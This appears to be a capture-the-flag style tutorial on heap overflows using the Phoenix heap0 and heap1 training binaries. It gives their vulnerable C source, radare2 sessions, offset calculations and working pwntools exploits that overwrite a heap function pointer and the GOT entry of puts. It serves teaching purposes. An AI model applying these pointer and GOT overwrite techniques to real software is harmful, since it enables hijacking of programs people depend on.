Heap Overflow

A heap overflow, much like a stack overflow, involves writing more data to a heap buffer than it was allocated to hold. The excess overwrites neighbouring data on the heap, most importantly pointers. If the program blindly trusts what is on the heap, an overwritten pointer can redirect execution or cause user input to be copied to a location of our choosing.

To introduce this (it's easier to understand with an example) I will use two vulnerable binaries from Phoenix, the successor to Protostar.

heap0

http://exploit.education/phoenix/heap-zero/

Source

Luckily it gives us the source:

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct data {
  char name[64];
};

struct fp {
  void (*fp)();
  char __pad[64 - sizeof(unsigned long)];
};

void winner() {
  printf("Congratulations, you have passed this level\n");
}

void nowinner() {
  printf(
      "level has not been passed - function pointer has not been "
      "overwritten\n");
}

int main(int argc, char **argv) {
  struct data *d;
  struct fp *f;

  if (argc < 2) {
    printf("Please specify an argument to copy :-)\n");
    exit(1);
  }

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  strcpy(d->name, argv[1]);

  printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
  fflush(stdout);

  f->fp();

  return 0;
}

Analysis

So let's analyse what it does:

Allocates two chunks on the heap
Sets the fp variable of chunk f to the address of nowinner
Copies the first command-line argument to the name variable of the chunk d
Runs whatever the fp variable of f points at

The weakness here is clear - it calls whatever address is stored in a function pointer on the heap. Our input is copied into the chunk just before that pointer after the pointer has been set, and there's no bounds checking whatsoever, so we can overrun it easily.
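To make the overflow concrete, here is a toy Python model of the two chunks. It is only a sketch: the 16-byte gap between the end of name and the start of fp, and both function addresses, are made-up assumptions for illustration rather than values read from the binary.

```python
import struct

NAME_SIZE = 64          # sizeof(struct data), taken from the source
ASSUMED_GAP = 16        # hypothetical allocator metadata between the chunks
NOWINNER = 0x400607     # hypothetical address of nowinner
WINNER = 0x4005f6       # hypothetical address of winner


def strcpy(memory, dest, src):
    """Copy src plus a terminating null into memory, with no bounds check."""
    data = src + b"\x00"
    memory[dest:dest + len(data)] = data


# One flat buffer stands in for the heap: name, gap, then the function pointer.
fp_offset = NAME_SIZE + ASSUMED_GAP
heap = bytearray(fp_offset + 8)
struct.pack_into("<Q", heap, fp_offset, NOWINNER)    # f->fp = nowinner


def read_fp():
    """Return the 64-bit value currently stored in the modelled f->fp."""
    return struct.unpack_from("<Q", heap, fp_offset)[0]


strcpy(heap, 0, b"A" * 12)                 # short input: the pointer is untouched
assert read_fp() == NOWINNER

# Long input: padding up to the pointer, then the non-null bytes of the address.
overflow = b"A" * fp_offset + struct.pack("<Q", WINNER).rstrip(b"\x00")
strcpy(heap, 0, overflow)
print(hex(read_fp()))
```

In this model the short input leaves the pointer alone, while the long one replaces it with the modelled winner address, which is the same effect the real strcpy has on f->fp.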

Regular Execution

Let's check out the heap in normal conditions.

$ r2 -d -A heap0 AAAAAAAAAAAA            <== that's just a parameter
$ s main; pdf
[...]
0x0040075d      e8fefdffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
0x00400762      488b45f8       mov rax, qword [var_8h]
[...]

We'll break right after the strcpy and see how it looks.

[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762

If we want, we can check the contents.

So, we can see that the function address is there, after our input in memory. Let's work out the offset.

Working out the Offset

Since we want to work out how many characters we need until the pointer, I'll just use a De Bruijn Sequence.

$ ragg2 -P 200 -r

$ r2 -d -A heap0 AAABAACAADAAE...

Let's break on and after the strcpy. That way we can check the location of the pointer then immediately read it and calculate the offset.

[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d

So, the chunk with the pointer is located at 0x2493060. Let's continue until the next breakpoint.

[0x0040075d]> dc
hit breakpoint at: 0x400762

radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.

Notice we overwrote the size field, so the chunk now appears much bigger than it really is. But now we can easily use the first value to work out the offset (we could also, knowing the location, have done pxq @ 0x02493060).

[0x00400762]> wopO 0x6441416341416241
80

So, fairly simple - 80 characters, then the address of winner.
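For readers without radare2 to hand, the lookup that wopO performs can be approximated in plain Python. This is a sketch, not ragg2's implementation: the alphabet order (upper case, lower case, digits) and the subsequence length of 3 are assumptions, chosen because they reproduce the AAABAACAADAAE prefix shown above.

```python
import string
import struct

# Assumed alphabet order; only the upper and lower case letters matter here.
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits


def de_bruijn(alphabet, n, length):
    """Return the first `length` characters of a De Bruijn sequence B(k, n)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if len(out) >= length:          # stop early once we have enough
            return
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out[:length])


def pattern_offset(value, pattern):
    """Find where a 64-bit little-endian value read from memory sits in pattern."""
    needle = struct.pack("<Q", value).decode("ascii")
    return pattern.find(needle)


pattern = de_bruijn(ALPHABET, 3, 200)
print(pattern[:13])
print(pattern_offset(0x6441416341416241, pattern))
```

The value passed to pattern_offset is the one read out of the corrupted chunk above. Because every 3-character window of the sequence is unique, the 8 bytes found in memory identify exactly one position in the input.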

Exploit

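from pwn import *

# Setting context.binary lets flat() pack addresses for the binary's architecture
elf = context.binary = ELF('./heap0')

# 80 bytes of padding reach f->fp, then the address of winner overwrites it
payload = (b'A' * 80 + flat(elf.sym['winner'])).replace(b'\x00', b'')

# The payload is passed as argv[1], which main copies with strcpy
p = elf.process(argv=[payload])

print(p.clean().decode('latin-1'))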

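We need to remove the null bytes because each argv entry is a null-terminated string, so it cannot contain them. This is safe here because the upper bytes of the original pointer are already zero, and strcpy appends a terminating null of its own.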
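The null-byte handling can be sketched with the standard library alone. The addresses below are hypothetical, and the helper names are mine rather than anything from pwntools. The sketch also uses rstrip instead of replace, so that a null byte inside the address is reported rather than silently dropped.

```python
import struct


def argv_safe_address(address):
    """Pack a 64-bit little-endian address and drop its trailing null padding.

    Raises ValueError if a null byte would remain inside the string, because
    an argv entry would be cut short at that byte.
    """
    packed = struct.pack("<Q", address).rstrip(b"\x00")
    if b"\x00" in packed:
        raise ValueError(f"{address:#x} contains an interior null byte")
    return packed


def overwrite_like_strcpy(old_pointer, new_bytes):
    """Return the pointer value after strcpy writes new_bytes over it."""
    field = bytearray(struct.pack("<Q", old_pointer))
    data = new_bytes + b"\x00"          # strcpy appends the terminator
    n = min(len(data), 8)               # only look at the 8-byte pointer field
    field[:n] = data[:n]
    return struct.unpack("<Q", bytes(field))[0]


NOWINNER = 0x400607        # hypothetical old pointer with zero upper bytes
WINNER = 0x4005f6          # hypothetical target address
LIBC_LIKE = 0x7ffff7a62000 # hypothetical old pointer with non-zero upper bytes

tail = argv_safe_address(WINNER)
print(hex(overwrite_like_strcpy(NOWINNER, tail)))
print(hex(overwrite_like_strcpy(LIBC_LIKE, tail)))
```

The first call ends up with exactly the target address. The second leaves stale upper bytes behind, which is why stripping the nulls only works when the pointer being overwritten already has zeros in those positions.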

heap1

http://exploit.education/phoenix/heap-one/

Source

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

struct heapStructure {
  int priority;
  char *name;
};

int main(int argc, char **argv) {
  struct heapStructure *i1, *i2;

  i1 = malloc(sizeof(struct heapStructure));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct heapStructure));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}

void winner() {
  printf(
      "Congratulations, you've completed this level @ %ld seconds past the "
      "Epoch\n",
      time(NULL));
}

Analysis

This program:

Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name of that heapStructure
Repeats the process with another heapStructure
Copies the two command-line arguments to the name variables of the heapStructures
Prints something

Regular Execution

Let's break on and after the first strcpy.

$ r2 -d -A heap1 AAAA BBBB

As we expected, we have two pairs of heapStructure and name chunks. We know the strcpy will be copying into wherever name points, so let's read the contents of the first heapStructure. Maybe this will give us a clue.

Look! The name pointer points to the name chunk! You can see the value 0x602030 being stored.

This isn't particularly a revelation in itself - after all, we knew there was a pointer in the chunk. But now we're certain, and we can definitely overwrite this pointer due to the lack of bounds checking. And because we can also control the value being written, this essentially gives us an arbitrary write!

And where better to target than the GOT?

Exploitation

The plan, therefore, becomes:

Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
Next time the function is called, it will call winner
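The four steps above can be modelled with a small Python simulation. Everything concrete in it is an assumption made for illustration: the addresses, the dictionary-based memory, and the layout that puts the second name pointer 40 bytes after the first name buffer (that distance is measured further down).

```python
import struct

# Hypothetical addresses, chosen only to make the model readable.
I1_NAME_BUF = 0x602030      # where i1->name points
I2_NAME_PTR = 0x602058      # where the i2->name field itself lives
I2_NAME_BUF = 0x602070      # where i2->name points originally
GOT_SLOT = 0x601018         # GOT entry of the function we hijack
OLD_TARGET = 0x4004c6       # what that entry holds before the overwrite
WINNER = 0x400716

memory = {}                 # sparse byte-addressed memory: address -> byte


def write(addr, data):
    for i, b in enumerate(data):
        memory[addr + i] = b


def read_qword(addr):
    raw = bytes(memory.get(addr + i, 0) for i in range(8))
    return struct.unpack("<Q", raw)[0]


def strcpy(dest, src):
    """Unbounded copy of src plus its terminating null."""
    write(dest, src + b"\x00")


def addr_bytes(addr):
    """Little-endian address with trailing nulls stripped, as argv requires."""
    return struct.pack("<Q", addr).rstrip(b"\x00")


write(I2_NAME_PTR, struct.pack("<Q", I2_NAME_BUF))
write(GOT_SLOT, struct.pack("<Q", OLD_TARGET))

padding = I2_NAME_PTR - I1_NAME_BUF
arg1 = b"A" * padding + addr_bytes(GOT_SLOT)
arg2 = addr_bytes(WINNER)

strcpy(I1_NAME_BUF, arg1)                 # overflow repoints i2->name at the GOT
strcpy(read_qword(I2_NAME_PTR), arg2)     # the program itself writes argv[2] there

print(hex(read_qword(GOT_SLOT)))
```

The second strcpy is the program's own code doing the write for us: it trusts i2->name, so whatever address we planted there receives the bytes of the second argument.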

But what function should we overwrite? The only function called after the strcpy is printf, according to the source code. And if we overwrite printf with winner, winner's own call to printf will jump straight back into winner and recurse forever.

Luckily, compilers like gcc replace a printf call with puts when the format string contains no format specifiers and ends in a newline - we can see this with radare2:

$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6      e8f5fdffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
0x004006eb      bfa8074000     mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0      e8fbfdffff     call sym.imp.puts

So we can simply overwrite the GOT entry of puts with the address of winner. All we need to find now is the padding until the pointer and then we're good to go.

$ ragg2 -P 200 -r
AAABAA...

$ r2 -d -A heap1 AAABAA... 0000

Break on and after the strcpy again and analyse the second chunk's name pointer.

The second heapStructure is at 0x8d9050; once the strcpy occurs, its name pointer holds 0x41415041414f4141.

[0x004006cd]> wopO 0x41415041414f4141
40

The offset is 40.
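The value 40 can be cross-checked with some arithmetic, assuming a glibc-style allocator on x86-64 (8-byte size field, 16-byte alignment, 32-byte minimum chunk). These constants are my assumption about the allocator rather than something the source states, so treat this as a sanity check on the measured offsets and not as a replacement for measuring them.

```python
SIZE_SZ = 8          # assumed width of the chunk size field
ALIGN = 16           # assumed chunk alignment
MIN_CHUNK = 32       # assumed smallest chunk the allocator hands out


def chunk_size(request):
    """Bytes consumed by one allocation, including its size field."""
    size = (request + SIZE_SZ + ALIGN - 1) & ~(ALIGN - 1)
    return max(size, MIN_CHUNK)


def heap1_offset():
    """Distance from the start of i1->name's buffer to the i2->name field."""
    # Allocation order in main: i1 (16 bytes), i1->name (8), i2 (16), i2->name (8).
    i1_name_buf = chunk_size(16)             # measured from the start of i1
    i2 = i1_name_buf + chunk_size(8)
    i2_name_field = i2 + 8                   # int priority, 4 bytes padding, then name
    return i2_name_field - i1_name_buf


def heap0_offset():
    """Distance from d->name to f->fp: one chunk holding a 64-byte struct."""
    return chunk_size(64)


print(heap1_offset(), heap0_offset())
```

Under those assumptions the arithmetic agrees with both offsets found with the De Bruijn pattern, for heap1 and for heap0 earlier.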

Final Exploit

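from pwn import *

elf = context.binary = ELF('./heap1', checksec=False)

# argv[1]: 40 bytes of padding reach i2->name, which is repointed at the GOT entry of puts
param1 = (b'A' * 40 + p64(elf.got['puts'])).replace(b'\x00', b'')
# argv[2]: the second strcpy then writes the address of winner into that GOT entry
param2 = p64(elf.sym['winner']).replace(b'\x00', b'')

p = elf.process(argv=[param1, param2])

print(p.clean().decode('latin-1'))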

Again, null bytes aren't allowed in parameters so you have to remove them.
